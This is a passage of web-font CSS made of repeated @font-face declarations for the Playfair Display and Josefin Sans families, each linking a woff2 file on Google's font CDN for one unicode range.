swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk7yRZrPJ-M.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7yRZrPA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgEM86xRbPQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgciw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgciw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHg.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, 